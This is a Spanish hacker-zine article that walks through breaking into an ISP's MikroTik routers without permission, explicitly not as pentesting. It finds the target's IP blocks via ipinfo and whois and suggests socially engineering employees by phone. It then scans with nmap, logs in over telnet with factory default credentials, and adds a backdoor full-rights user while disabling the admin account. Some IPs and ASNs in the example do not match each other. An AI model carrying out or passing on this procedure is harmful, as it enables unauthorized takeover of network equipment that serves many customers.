==============================================================================================
=        =========  ============================      ========================================
=  ===============  ============================  ===  =======================================
=  ===============  ============================  ====  ========================  ====  ======
=  =========   ===  =====  ===   ===  = ========  ===  ====   ===  = ====   ===    ==    ==  =
=      ====  =  ==    =======  =  ==     =======      ====     ==     ==  =  ===  ====  ======
=  ===========  ==  =  ==  =====  ==  =  =======  ===  ===  =  ==  =  ==     ===  ====  ===  =
=  =========    ==  =  ==  ===    ==  =  =======  ====  ==  =  ==  =  ==  ======  ====  ===  =
=  ========  =  ==  =  ==  ==  =  ==  =  =======  ===  ===  =  ==  =  ==  =  ===  ====  ===  =
=  =========    ==    ===  ===    ==  =  =======      =====   ===  =  ===   ====   ===   ==  =
==============================================================================================

Cápsula Gemini de Fabián Bonetti

Sobre GNU/Linux, Software Libre y demas

Revista ATDT Número 1 (Febrero 2021) 1-6-2021

  	_________________________________________________________________________________
  
	/* 
	   ATDT MAGAZINE :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
	   :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
	   :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::[0x01-04]:
	   NUMERO 0x01::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

	 			"Auditando ISPs basados en MikroTik" por [Hellaiser]"
	*/

	No. No es pentesting per-se. No siempre el mono baila por la plata. 
	¿Esta mal el bugbounty? Personalmente creo que no. Pero el mundo esta dominado
	por los sombreros blancos y los ethical hackers. Dejemos eso de lado, aunque
	sea durante este poco pretensioso articulo.

	Si estas leyendo este zine, probablemente lo hayas bajado o te lo hayan
	pasado por alguna red social, servicio de mensajería digital o mediante
	DCC por IRC y por ende (y descarte), atraves de Internet.

	Que es un ISP? (aclaro por si las dudas, nunca esta de mas) ISP son las 
	siglas de "Internet Service Provider" o "Proveedor de Servicios de Internet"
	y son esas empresas (pequeñas/medianas, grandes o multinacionales) que
	nos venden la conexion hacia la "red de redes".


	  MMMM    MMMM       KKK                          TTTTTTTTTTT      KKK
	  MMM MMMM MMM  III  KKK  KKK  RRRRRR     OOOOOO      TTT     III  KKK  KKK
	  MMM  MM  MMM  III  KKKKK     RRR  RRR  OOO  OOO     TTT     III  KKKKK
	  MMM      MMM  III  KKK KKK   RRRRRR    OOO  OOO     TTT     III  KKK KKK
	  MMM      MMM  III  KKK  KKK  RRR  RRR   OOOOOO      TTT     III  KKK  KKK
	

	Que es MikroTik? es un fabricante importante de hardware para networking
	que va desde simple routers SOHO hogareños hasta CCR (cloud core routers)
	muy usados en el negocio de los ISPs hoy por hoy por una relacion
	de equilibrio entre costo y fiabilidad.

	Bien, aca comienza el articulo que no pretende mas que ser una charla
	de barcito (San Jose 05 XD) sobre ver cuan seguro es un ISP del borde
	hacia el exterior (basicamente, desde sus routers principales con
	conexion a internet con algun carrier) ergo , nosotros.
	             
		   _______________              _______________
		  |  ___________  |            |  ___________  |
		  | |           | |            | |           | |
		  | |           | |            | |           | |
		  | |           | |            | |           | |
		  | |           | |            | |           | |
		  | |___________| |            | |___________| |
		  |_______________|            |_______________|
		    _|________|_.................._|________|_
		   / ********** \                / ********** \
		 /  ************  \            /  ************  \
		--------------------          --------------------

	=====> MANOS A LA OBRA!
	
	Asumo que desconocemos los bloques de IP asignados al ISP al cual queremos
	testear su nivel de seguridad pero tambien asumo que conocemos al menos
	el nombre o razon social del mismo como para comenzar a rastrear sus bloques
	de direcciones (en este caso nos enfocaremos en IPv4) asignadas.
	
				=[AVERIGUANDO BLOQUES IP]=

	Por supuesto, utilizaremos un ISP ficticio (de ahora en mas lo llamaremos
	Pepe NET) por razones mas que obvias.

	Abriremos nuestro navegador de preferencia y accederemos al dominio
	<https://ipinfo.io/countries/ar> , donde veremos un listado de todos los
	poseedores de segmentos publicos IPv4 en Argentina.

	NOTA: Podemos sustituir "ar" por las siglas del pais que necesitemos listar,
	por ejemplo si es para España, seria /es. 

	[LYNX o.O]
	***************************************************************************
        *                            Argentina ASN Summary                        *
	* 									  *
	*  The report below shows ASNs assigned to Argentina, ranked by the total *
	*  number of IP addresses currently active on each network. Click on the  *
	*  ASN for full IP address information, whois details and more.           *
	*  You can also view our hosting report to see the networks ranked by how *
	*  many domain names they host.						  *
	*									  *
	*   ASN Name Num IPs							  *
	*   AS73012 Pepe NET 69,632						  *
	*   AS22927 Telefonica de Argentina 3,995,392				  *
	*   AS10318 Telecom Argentina S.A. 2,124,288				  *
	*   AS10481 Telecom Argentina S.A. 1,549,824				  *
	*   AS19037 AMX Argentina S.A. 1,136,640				  *
	*   AS11664 Techtel LMDS Comunicaciones Interactivas S.A. 871,424	  *
	*   AS27747 Telecentro S.A. 633,344					  *
	*   AS10834 Telefonica de Argentina 386,816				  *
	*   AS11315 Telefónica Móviles Argentina S.A. (Movistar Argentina)        *
	*   AS16814 NSS S.A. 161,280						  *
	*   AS27983 Red Intercable Digital S.A. 116,480				  *
	*   AS20207 Gigared S.A. 108,800					  *
	*   AS26608 Telecom Argentina S.A. 90,112				  *
	*   AS27984 Ver Tv S.A. 76,800						  *
	*   AS28075 ARLINK S.A. 69,632						  *
	*   AS3597 Fundación InnovaT 65,792					  *
	*   AS4270 Red de Interconexion Universitaria 65,536			  *
	*   									  *
	***************************************************************************
						   [https://ipinfo.io/countries/ar]
	
	Bien, puse apenas algunos de los resultados del query de dicho listado.
	Veremos varios conocidos en la lista pero nos enfocaremos en el ISP que
	estabamos buscando (Pepe NET)

			*************************************
			*   ASN Name Num IPs		    *
			*   AS73012 Pepe NET 69,632         *
			*************************************
	
	El resultado esta dividido en tres partes:
		1) Nro. de ASN 	
		2) Nombre/razon social del ISP
		3) Cantidad de IPs /32 asignadas

	Para llegar al contenido de el punto tres (Cantidad de IPs), por ende
	finalmente conocer en detalle que bloques IPv4 tiene asignados Pepe NET
	tendremos que ingresar a su ASN (los items de la columna "ASN" son links
	hacia la pagina del mismo (en este caso AS73012 que es el de Pepe NET):
	
	$ lynx [https://ipinfo.io/AS73012]

	[LYNX O.o]
	***************************************************************************
	*       Netblock            Description        Num IPs			  *
	*   132.75.0.0/24    PEPE NET                  256			  *
	*   132.75.1.0/24    PEPE NET                  256			  *
	*   132.75.2.0/24    PEPE NET                  256			  *
	*   132.75.3.0/24    PEPE NET                  256			  *
	*   168.191.204.0/24 PEPE NET                  256			  *
	*   168.191.205.0/24 PEPE NET                  256			  *
	*   168.191.206.0/24 PEPE NET                  256			  *
	*   168.191.207.0/24 PEPE NET                  256                        *
	*   168.95.10.0/24   PEPE NET                  256 			  *
	*   168.95.11.0/24   PEPE NET                  256			  *
	*   168.95.8.0/24    PEPE NET                  256			  *
	*   168.95.9.0/24    PEPE NET                  256			  *
	***************************************************************************
							[https://ipinfo.io/AS73012]

	Listo, dimos en el clavo: la lista de bloques IPv4 asignados a Pepe NET.

	Aca el resultado tambien se divide en tres partes:
		1) Netblock
		2) Description
		3) Num IPs

	Su lectura es mas que sencilla. La primera parte (Netblock) es el dato que mas
	nos interesa (la red y mascara de la misma, lo cual usaremos para auditar);
	la segunda es "Description" que basicamente es el nombre del ISP en cuestion
	y por ultimo, la cantidad de IPs que contiene el netblock (en este caso al
	ser una mascara /24, contiene 256 IPs de las cuales solo 254 son "usables").

	Veremos que PEPE NET tiene 12 segmentos /24 (3072 IPs), por lo tanto tenemos
	para entretenernos un rato. Ahora iremos al siguiente paso: recavar mayor
	informacion del ISP.


				=[RECAVANDO MAYOR INFO DEL ISP]=
	
	Como la informacion es poder, el poder es fuerza y la fuerza abre casi cualquier
	puerta, vamos a conseguir mayor informacion del ISP haciendo uso de la herramienta
	'whois' (man whois):
	
	$ whois AS28075

	Al ejecutar 'whois <ASN>' este nos traera la informacion de registro que el
	ISP brindo para adquirir los bloques de IP frente a LACNIC:


	[WHOIS o.O]
	***************************************************************************
	*	aut-num:     AS28075						  *
	*	owner:       PEPE NET    				 	  *
	*       ownerid:     AR-ARSA1148-LACNIC					  *
	*	responsible: Pepe Gonzalez					  *
	*	address:     Av. Presidente Menem, 3150, 			  *
	*	address:     5500 - Mendoza - 					  *
	*	country:     AR							  *
	*	phone:       +54 261 3583123 [6072]				  *
	*	owner-c:     SGR						  *
	*	routing-c:   SGR						  *
	*	abuse-c:     SGR						  *
	*	created:     20090804						  *
	*	changed:     20150527						  *
	*	inetnum:     168.90.8.0/22					  *
	*	inetnum:     143.202.192.0/22					  *
	*	inetnum:     131.72.0.0/22					  *
	*	inetnum:     181.118.64.0/18					  *
	*	inetnum:     201.190.128.0/17					  *
	*	inetnum:     190.113.160.0/19					  *
	*	inetnum:     190.113.128.0/19					  *
	*									  *
	*	nic-hdl:     SGR						  *
	*	person:      Pepe Roberto Gonzalez				  *
	*	e-mail:      pepe.gonzalez@pepenet.com.ar			  *
	*	address:     Av. Presidente Menem, 3150, , -			  *
	*	address:     5500 - Mendoza - 					  *
	*	country:     AR							  *
	*	phone:       +54  3583123 [0000]				  *
	*	created:     20090518						  *
	*	changed:     20200707						  *
	***************************************************************************	
							            [whois AS28075]

	Bueno, aca -amen de los bloques IP- notaras que la data que predomina es
	la fisica del mundo terrenal: Direccion fiscal, titular de Pepe NET, mail
	y hasta numero de telefono de contacto. Esta es otra herramienta para
	recavar data en cuanto a materia acceso sobre Pepe ISP no menos importante
	que sus bloques IP: esta es data de contacto para hacer gala de nuestras
	dotes de ingenieria social.

	Con esta data podremos por ejemplo, comunicarnos telefonicamente para 
	ver si hay algun empleado lengua floja que nos pueda brindar mas data
	de acceso a sus sistemas. Pero eso te lo dejo a tu merced jajaja.


				=[COMENZANDO]=
			
	Ahora si, con la data ya recavada, procedemos a indagar en sus bloques IP.
	
	Comenzamos a scannear los puertos de los bloques IP de Pepe NET

	# nmap -v -T4 -p 8291,8728,22,23,53,21,80 132.75.0.0/24 | grep open
	
	Basicamente, buscamos filtrar IPs dentro del bloque 168.95.10.0/24 con los
	siguientes puertos ABIERTOS (si cambiamos "open" por "filtered" en el grep,
	nos dará los hosts que tienen los puertos "abiertos" pero filtrados por alguna
	regla de firewall):

		 * telnet   23   
		 * ftp      21   
		 * www      80   
		 * ssh      22   
		 * api      8728
		 * winbox   8291
		 * dns      53

	Los dos ultimos puertos (8728 y 8291) son servicios propietarios de MikroTik.

	El 8291 (Winbox) es el puerto mediante el cual se comunica la aplicacion 
	"Winbox" que basicamente es un GUI grafico para la configuracion de los RB
	en cuestion.
 
	El 8728 es el port del API (Application Programmers Interface) de MikroTik 
	que permite a los programadores desarrollar aplicaciones que se comuniquen 
	con el RB.


	[NMAP o.O]
	***************************************************************************
	*	Discovered open port 21/tcp on 132.75.0.10			  *
	*	Discovered open port 23/tcp on 132.75.0.10			  *
	*	Discovered open port 22/tcp on 132.75.0.10			  *
	*	Discovered open port 53/tcp on 132.75.0.10			  *
	*	Discovered open port 80/tcp on 132.75.0.10			  *
	*	Discovered open port 8728/tcp on 132.75.0.10			  *
	*	Discovered open port 8291/tcp on 132.75.0.10			  *
	***************************************************************************		
	      [# nmap -v -T4 -p 8291,8728,22,23,53,21,80 132.75.0.0/24 | grep open] 
	
	Claramente, esto es un fragmento apenas (y simbolico) de un scanneo de una 
	red /24 completa donde encontramos un ejemplo BINGO (jaja) de host MK con 
	todos los ports que nos interesan abiertos: FTP, TELNET, SSH, DNS, WEB,
	API y WINBOX.

	Lo primero (y unico) que vamos a probar vos y yo es si, por ejemplo, tiene
	el user y pass de fabrica (aunque no parezca, es un error MUY comun por parte
	de los network admin mal pagos o guitarreros). Probemos por telnet:

	El user y pass de fabrica son: 
		* Username: admin
		* Password: <vacio>

      [TELNET o.O]
      *****************************************************************************
      * Trying 192.168.70.209...						  *
      * Connected to 192.168.70.209.						  *
      * Escape character is '^]'.						  *
      * Login: admin								  * 
      * Password: 								  *
      * 									  *
      * MMM      MMM       KKK                          TTTTTTTTTTT      KKK      *
      * MMMM    MMMM       KKK                          TTTTTTTTTTT      KKK      *
      * MMM MMMM MMM  III  KKK  KKK  RRRRRR     OOOOOO      TTT     III  KKK  KKK * 
      * MMM  MM  MMM  III  KKKKK     RRR  RRR  OOO  OOO     TTT     III  KKKKK    *  
      * MMM      MMM  III  KKK KKK   RRRRRR    OOO  OOO     TTT     III  KKK KKK  *
      * MMM      MMM  III  KKK  KKK  RRR  RRR   OOOOOO      TTT     III  KKK  KKK *
      *										  *
      *	  MikroTik RouterOS 6.46.8 (c) 1999-2020       http://www.mikrotik.com/   *
      *                                                                           *
      *										  *
      * [admin@MikroTik] >                       				  *
      *****************************************************************************	
							     [$ telnet 132.75.0.10]
	
	Evidentemente, el fallo capa 8 estuvo presente en este pobre MikroTik.

	Por ultimo (y para comenzar, ya que a partir de aca las posibilidades son
	casi infinitas si sabemos usar el scripting, /user/script en el MK) vamos
	a ownear el equipo:

      [TELNET o.O]
      *****************************************************************************
      * [admin@MikroTik] > /user pr                    				  *
      * Flags: X - disabled                                                       *
      *	#   NAME           GROUP          ADDRESS            LAST-LOGGED-IN       *
      * 0   ;;; system default user                                               *
      *     admin          full                           jan/14/2021 15:36:04    *
      *                                                                           *
      * > /user add name=0wned password=0wned group=full comment="0wned!"         *
      *                                                                           *
      * > /user pr                                                                *
      *	#   NAME           GROUP          ADDRESS            LAST-LOGGED-IN       *
      * 0   ;;; system default user                                               *
      *     admin          full                           jan/14/2021 15:36:04    *
      * 1   ;;; 0wned!                                                            *
      *     0wned          full                                                   *
      *                                                                           *
      * > /user set 0 disabled=yes                                                *
      * > /user pr                                                                *
      *	#   NAME           GROUP          ADDRESS            LAST-LOGGED-IN       *
      * 0 X ;;; system default user                                               *
      *     admin          full                           jan/14/2021 15:36:04    *
      * 1   ;;; 0wned!                                                            *
      *     0wned          full                                                   *      	
      *****************************************************************************	
							     [$ telnet 132.75.0.10]

				 _____                         _ _ 				
				|  _  |                       | | |
				| |/' |_      ___ __   ___  __| | |
				|  /| \ \ /\ / / '_ \ / _ \/ _` | |
				\ |_/ /\ V  V /| | | |  __/ (_| |_|
				 \___/  \_/\_/ |_| |_|\___|\__,_(_)

	Listo, el equipo ya es tuyo de momento. Basicamente lo que hicimos fue
	logearnos como admin, agregar el user "0wned" con pass "0wned" dentro del
	grupo "full" (que nos permite leer/escribir, tal cual el admin) y luego 
	deshabilitar el user "admin" para que no ingrese nadie en el mientras (ya
	que el user "admin" no se puede cambiar).

	A partir de este momento, mediante scripting en MikroTik podemos hacer
	basicamente lo que querramos con este equipo.	
	
  		[START HERE: https://wiki.mikrotik.com/wiki/Manual:Scripting]

	Este articulo pretende, por ultimo, prenderte la lucecita para que aflojes
	la vagancia y este sea tu punto de partida. El resto de los servicios
	esta para que los investigues vos por tu cuenta ;)

	Espero te haya sido util y cumpla la funcion de ser una guia de como ponerse
	un metodo para estos objetivos y no un HOW-TO paso a paso que te entregue
	en bandeja un resultado.

	nos l33mos pront0!	
	
	##################
	## [Hellraiser] ##
	##################
	
	# shutdown -p now
	_________________________________________________________________________________
	!EOF -> atdt-zine-0x01-04.txt

atdt-zine-0x05

Volver

© 2021